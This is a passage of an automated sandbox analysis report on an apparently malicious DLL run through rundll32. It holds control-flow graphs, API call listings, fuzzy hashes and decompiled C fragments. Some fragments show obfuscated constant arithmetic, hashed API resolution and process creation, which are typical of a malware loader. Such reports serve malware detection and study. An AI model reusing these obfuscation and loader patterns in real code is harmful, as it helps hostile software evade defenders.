                                                                                                                                                                                      control_flow_graph 575 6e9ec050-6e9ec090 call 6e9ec70e 578 6e9ec094-6e9ec097 575->578 579 6e9ec0af-6e9ec0b0 578->579 580 6e9ec099-6e9ec0a4 578->580 579->578 580->579 581 6e9ec0a6-6e9ec0ad 580->581 581->579 582 6e9ec0b2-6e9ec0c8 GetPEB 581->582 583 6e9ec0ce 582->583 584 6e9ec1dc-6e9ec256 CreateFileA GetLastError VirtualAlloc 582->584 585 6e9ec0d0-6e9ec0d9 583->585 598 6e9ec26e-6e9ec27a 584->598 599 6e9ec258-6e9ec25c 584->599 587 6e9ec0e0-6e9ec0e9 585->587 588 6e9ec0ee-6e9ec0fa 587->588 589 6e9ec0eb 587->589 588->587 591 6e9ec0fc-6e9ec102 588->591 589->588 592 6e9ec108-6e9ec125 591->592 593 6e9ec1b7-6e9ec1bc 591->593 597 6e9ec127-6e9ec12f 592->597 595 6e9ec1be-6e9ec1c0 593->595 596 6e9ec1c9-6e9ec1d2 593->596 595->596 600 6e9ec1c2-6e9ec1c7 595->600 596->585 602 6e9ec1d8 596->602 601 6e9ec130-6e9ec13f 597->601 604 6e9ec2bc-6e9ec2d0 598->604 605 6e9ec27c-6e9ec27f 598->605 603 6e9ec260-6e9ec26c 599->603 600->596 600->602 601->601 606 6e9ec141-6e9ec146 601->606 602->584 603->598 603->603 610 6e9ec2d6-6e9ec2d9 604->610 611 6e9ec365-6e9ec38f 604->611 609 6e9ec280-6e9ec2a3 605->609 607 6e9ec148-6e9ec14d 606->607 608 6e9ec156-6e9ec168 606->608 607->608 613 6e9ec14f-6e9ec154 607->613 614 6e9ec16a-6e9ec173 608->614 615 6e9ec175-6e9ec17a 608->615 616 6e9ec2b5-6e9ec2ba 609->616 617 6e9ec2a5-6e9ec2b3 609->617 610->611 612 6e9ec2df-6e9ec2f8 610->612 633 6e9ec43e-6e9ec455 611->633 634 6e9ec395-6e9ec3a6 611->634 626 6e9ec2fa 612->626 627 6e9ec34b-6e9ec35f 612->627 613->608 618 6e9ec1a0-6e9ec1a9 613->618 619 6e9ec19a 614->619 620 6e9ec17c-6e9ec185 615->620 621 6e9ec187-6e9ec18c 615->621 616->604 616->609 617->616 617->617 618->597 625 6e9ec1af-6e9ec1b3 618->625 619->618 620->619 621->619 624 6e9ec18e-6e9ec196 621->624 624->619 625->593 629 6e9ec300-6e9ec302 626->629 627->610 627->611 631 6e9ec326-6e9ec32e 629->631 632 6e9ec304-6e9ec308 629->632 639 6e9ec333-6e9ec349 631->639 632->631 635 6e9ec30a-6e9ec324 632->635 636 6e9ec476-6e9ec47e 633->636 637 6e9ec457-6e9ec45d 633->637 634->633 638 6e9ec3ac 634->638 635->639 642 6e9ec4cb-6e9ec4cf 636->642 643 6e9ec480-6e9ec490 call 6e9ebf10 636->643 637->636 640 6e9ec45f-6e9ec463 637->640 641 6e9ec3b0-6e9ec3bc 638->641 639->627 639->629 640->636 644 6e9ec465-6e9ec474 640->644 645 6e9ec3be 641->645 646 6e9ec425-6e9ec434 641->646 650 6e9ec4d4-6e9ec4ea call 6e9ec717 642->650 643->650 656 6e9ec492-6e9ec496 643->656 644->636 649 6e9ec3c0-6e9ec3d2 645->649 646->641 648 6e9ec43a 646->648 648->633 653 6e9ec3df-6e9ec3e3 649->653 654 6e9ec3d4-6e9ec3dd 649->654 658 6e9ec3e5-6e9ec3ee 653->658 659 6e9ec3f0-6e9ec3f4 653->659 657 6e9ec417-6e9ec41c 654->657 661 6e9ec498-6e9ec49e call 6e9ebfe0 656->661 662 6e9ec4a1-6e9ec4ca call 6e9ec717 656->662 657->649 666 6e9ec41e-6e9ec422 657->666 658->657 663 6e9ec3f6-6e9ec405 659->663 664 6e9ec407-6e9ec40b 659->664 661->662 663->657 664->657 668 6e9ec40d-6e9ec413 664->668 666->646 668->657
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9EC225
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9EC22B
                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6E9EC247
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocCreateErrorFileLastVirtual
                                                                                                                                                                                      • String ID: asd
                                                                                                                                                                                      • API String ID: 1112224254-4170839921
                                                                                                                                                                                      • Opcode ID: fddf2d6bbf969dcd7ea892298121c6a0753feb6770501003be214293c0b03f7a
                                                                                                                                                                                      • Instruction ID: a3cd8dba142dc6233869d4eb5f8af48549fcb6ebe0fc209cc509092714675bc2
                                                                                                                                                                                      • Opcode Fuzzy Hash: fddf2d6bbf969dcd7ea892298121c6a0753feb6770501003be214293c0b03f7a
                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE1BA71A083468FCB51CF98C880B2ABBE5BF88704F19496DEA959F745E331E845CF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6E9EC922
                                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6E9EC93C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                                      • Opcode ID: 2f3bd84f98e6af6ba924af37edf7ef105ae159db329885e45c55e037f8de656a
                                                                                                                                                                                      • Instruction ID: 0b1b04845117fac7accd0f08144f0fd831089a93afa5fa47c00b8e5fecf14dc6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f3bd84f98e6af6ba924af37edf7ef105ae159db329885e45c55e037f8de656a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 96419072D04695AFDB528FE98900BEE3EADEF95754F004919EA947F640C730C9418F90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 549 6e9ec98b-6e9ec99c call 6e9ed350 552 6e9ec99e-6e9ec9a4 549->552 553 6e9ec9ad-6e9ec9b4 549->553 552->553 554 6e9ec9a6-6e9ec9a8 552->554 555 6e9ec9b6-6e9ec9b9 553->555 556 6e9ec9c0-6e9ec9d4 dllmain_raw 553->556 557 6e9eca86-6e9eca95 554->557 555->556 558 6e9ec9bb-6e9ec9be 555->558 559 6e9eca7d-6e9eca84 556->559 560 6e9ec9da-6e9ec9eb dllmain_crt_dispatch 556->560 561 6e9ec9f1-6e9ec9f6 call 6e9d1290 558->561 559->557 560->559 560->561 563 6e9ec9fb-6e9eca03 561->563 564 6e9eca2c-6e9eca2e 563->564 565 6e9eca05-6e9eca07 563->565 566 6e9eca35-6e9eca46 dllmain_crt_dispatch 564->566 567 6e9eca30-6e9eca33 564->567 565->564 568 6e9eca09-6e9eca27 call 6e9d1290 call 6e9ec8db dllmain_raw 565->568 566->559 569 6e9eca48-6e9eca7a dllmain_raw 566->569 567->559 567->566 568->564 569->559
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3136044242-0
                                                                                                                                                                                      • Opcode ID: 715505ada279e7b5d304405419338bc298cc3c4d0059db8260d3d1d79207bf0f
                                                                                                                                                                                      • Instruction ID: f0fbcafacfbb65b3f6ee63989ab9c64752cf272abbb6fb27b0f790f6757b627d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 715505ada279e7b5d304405419338bc298cc3c4d0059db8260d3d1d79207bf0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 28217C72D006A9BFDB538EA5C840AAE3E6DEF85B94B014515FA947F610C331CD418FA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 673 6e9dc2a0-6e9dc2ad GetModuleHandleA 674 6e9dc2bc 673->674 675 6e9dc2af-6e9dc2bb GetProcAddress 673->675
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E9DC2A5
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6E9DC2B5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • WakeByAddressSingle, xrefs: 6E9DC2AF
                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0, xrefs: 6E9DC2A0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                                                                                                                                                                      • API String ID: 1646373207-1731903895
                                                                                                                                                                                      • Opcode ID: e005d492f860da8cb7ec06e2a1c5dd74bbbc753f1ea96773e41d2976cd028b80
                                                                                                                                                                                      • Instruction ID: 408ef1a74314adbfc51aaf7a18d5cf7ecc1052934693d08db99894190ab4ea47
                                                                                                                                                                                      • Opcode Fuzzy Hash: e005d492f860da8cb7ec06e2a1c5dd74bbbc753f1ea96773e41d2976cd028b80
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42B092F0A08D016F9E906AF169ACA862A98BFA324230844656A12F9600EA64C444DE29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 676 6e9dc320-6e9dc32d GetModuleHandleA 677 6e9dc33c 676->677 678 6e9dc32f-6e9dc33b GetProcAddress 676->678
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E9DC325
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6E9DC335
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                                                                                                                                                                                      • API String ID: 1646373207-1891578837
                                                                                                                                                                                      • Opcode ID: 3aba0017180609e0f217c2b116be250c61d12af3352bbe88572e3d22a43ab8d7
                                                                                                                                                                                      • Instruction ID: c8d842bfe43e1d4518ee61ff348148929629477a939c88d238032fd17c46cc82
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aba0017180609e0f217c2b116be250c61d12af3352bbe88572e3d22a43ab8d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 05B092F0A08D026E9E50AAF179ACA862968BF6324230844606817E9201EA64C040AD29
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6E9F4169
                                                                                                                                                                                        • Part of subcall function 6E9F4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E9F61E2,?,00000000,-00000008), ref: 6E9F411F
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9F41A1
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9F41C1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                                                                      • Opcode ID: bce45d00583867c950be4e9a7d9376ce311b86391f337ce732f3cd8f645f14b6
                                                                                                                                                                                      • Instruction ID: e3e30b2e70a8a55f945e734971d41f902f8151f6551ccfe4e27e76d222d735b4
                                                                                                                                                                                      • Opcode Fuzzy Hash: bce45d00583867c950be4e9a7d9376ce311b86391f337ce732f3cd8f645f14b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811E1F1614A16FE670117F65D89CEF696CDFB62A83100825F401D2100EB74DD038FB1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                      			E0281890E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                      				signed int _t60;
                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                      				E02818002(_t46);
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v28 = 0x5a89c2;
                                                                                                                                                                                      				_v12 = 0xac9734;
                                                                                                                                                                                      				_t60 = 0xf;
                                                                                                                                                                                      				_v12 = _v12 / _t60;
                                                                                                                                                                                      				_v12 = _v12 + 0xbff0;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x0000f03b;
                                                                                                                                                                                      				_v20 = 0x5d6235;
                                                                                                                                                                                      				_t20 =  &_v20; // 0x5d6235
                                                                                                                                                                                      				_t61 = 0x58;
                                                                                                                                                                                      				_v20 =  *_t20 * 0x48;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x1a4c6f32;
                                                                                                                                                                                      				_v8 = 0x1651ff;
                                                                                                                                                                                      				_v8 = _v8 / _t61;
                                                                                                                                                                                      				_v8 = _v8 + 0x3de9;
                                                                                                                                                                                      				_v8 = _v8 | 0x9dbfa52d;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x9dbe342b;
                                                                                                                                                                                      				_v16 = 0xc9b349;
                                                                                                                                                                                      				_v16 = _v16 >> 0xa;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000d61f6;
                                                                                                                                                                                      				_t57 = E0282E399(_t61, _v8 % _t61, _t61, 0xa2449830, 0x195, 0x5faffbf6);
                                                                                                                                                                                      				_t58 =  *_t57(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0x28, 0, _a20, _a24); // executed
                                                                                                                                                                                      				return _t58;
                                                                                                                                                                                      			}
















                                                                                                                                                                                      0x02818919
                                                                                                                                                                                      0x0281891b
                                                                                                                                                                                      0x0281892c
                                                                                                                                                                                      0x02818931
                                                                                                                                                                                      0x02818937
                                                                                                                                                                                      0x0281893e
                                                                                                                                                                                      0x0281894a
                                                                                                                                                                                      0x0281894f
                                                                                                                                                                                      0x02818954
                                                                                                                                                                                      0x0281895b
                                                                                                                                                                                      0x02818962
                                                                                                                                                                                      0x02818969
                                                                                                                                                                                      0x0281896d
                                                                                                                                                                                      0x02818971
                                                                                                                                                                                      0x02818974
                                                                                                                                                                                      0x0281897b
                                                                                                                                                                                      0x0281898c
                                                                                                                                                                                      0x0281898f
                                                                                                                                                                                      0x02818996
                                                                                                                                                                                      0x0281899d
                                                                                                                                                                                      0x028189a4
                                                                                                                                                                                      0x028189ab
                                                                                                                                                                                      0x028189af
                                                                                                                                                                                      0x028189cd
                                                                                                                                                                                      0x028189db
                                                                                                                                                                                      0x028189e2

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?), ref: 028189DB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileHandleInformation
                                                                                                                                                                                      • String ID: 5b]$=
                                                                                                                                                                                      • API String ID: 3935143524-2037004790
                                                                                                                                                                                      • Opcode ID: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
                                                                                                                                                                                      • Instruction ID: 139e4a28f7cbc3bed85565e49576bf6e3d0493c4f43f48c5966c9a908e87ef69
                                                                                                                                                                                      • Opcode Fuzzy Hash: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A216A79D41208BBDB14DF99CD4AAEEBFB5FB40310F108099E914BA280D7B95B159F90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBE96
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBEB4
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBECD
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBECF
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBED6
                                                                                                                                                                                        • Part of subcall function 6E9EBE60: GetTickCount64.KERNEL32 ref: 6E9EBEF4
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9D1333
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,00023800), ref: 6E9D134D
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 6E9D1437
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Count64Tick$Heap$AllocFreeProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2047189075-0
                                                                                                                                                                                      • Opcode ID: 282d8092b573d618e6732bc1ffe8e0ceefa167b362b3b604f070d827b940235a
                                                                                                                                                                                      • Instruction ID: d44e6ea67d34579b52c8e8991a720725a8b98f521578577a4111b943f409df94
                                                                                                                                                                                      • Opcode Fuzzy Hash: 282d8092b573d618e6732bc1ffe8e0ceefa167b362b3b604f070d827b940235a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5551B075A04B508BD321CF69D940A96BBF8FF59314F108A2DE9D68BA91E730F549CB80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E02829100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				int _t60;
                                                                                                                                                                                      				WCHAR* _t64;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t64 = __edx;
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a64);
                                                                                                                                                                                      				_push(_a60);
                                                                                                                                                                                      				_push(_a56);
                                                                                                                                                                                      				_push(_a52);
                                                                                                                                                                                      				_push(_a48);
                                                                                                                                                                                      				_push(_a44);
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E02818002(_t52);
                                                                                                                                                                                      				_v28 = 0x2905a5;
                                                                                                                                                                                      				_v24 = 0;
                                                                                                                                                                                      				_v12 = 0xa2d8b8;
                                                                                                                                                                                      				_v12 = _v12 + 0xfffff871;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5b121ec8;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x21b4fd5f;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x7a067dbd;
                                                                                                                                                                                      				_v8 = 0x36027e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x6c06375b;
                                                                                                                                                                                      				_v8 = _v8 * 0x51;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff0cdd;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x3b3a0501;
                                                                                                                                                                                      				_v20 = 0x3133e6;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa81fc925;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa82b7027;
                                                                                                                                                                                      				_v16 = 0x47f0fa;
                                                                                                                                                                                      				_v16 = _v16 | 0xed8e49a9;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xedcdbeb4;
                                                                                                                                                                                      				E0282E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
                                                                                                                                                                                      				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
                                                                                                                                                                                      				return _t60;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x0282910a
                                                                                                                                                                                      0x0282910c
                                                                                                                                                                                      0x0282910d
                                                                                                                                                                                      0x0282910e
                                                                                                                                                                                      0x02829111
                                                                                                                                                                                      0x02829114
                                                                                                                                                                                      0x02829117
                                                                                                                                                                                      0x0282911a
                                                                                                                                                                                      0x0282911d
                                                                                                                                                                                      0x02829120
                                                                                                                                                                                      0x02829123
                                                                                                                                                                                      0x02829126
                                                                                                                                                                                      0x02829127
                                                                                                                                                                                      0x0282912a
                                                                                                                                                                                      0x0282912d
                                                                                                                                                                                      0x02829130
                                                                                                                                                                                      0x02829133
                                                                                                                                                                                      0x02829134
                                                                                                                                                                                      0x02829137
                                                                                                                                                                                      0x02829138
                                                                                                                                                                                      0x02829139
                                                                                                                                                                                      0x0282913a
                                                                                                                                                                                      0x0282913f
                                                                                                                                                                                      0x02829149
                                                                                                                                                                                      0x0282914c
                                                                                                                                                                                      0x02829153
                                                                                                                                                                                      0x0282915a
                                                                                                                                                                                      0x02829161
                                                                                                                                                                                      0x02829168
                                                                                                                                                                                      0x0282916f
                                                                                                                                                                                      0x02829176
                                                                                                                                                                                      0x0282918e
                                                                                                                                                                                      0x02829191
                                                                                                                                                                                      0x02829198
                                                                                                                                                                                      0x0282919f
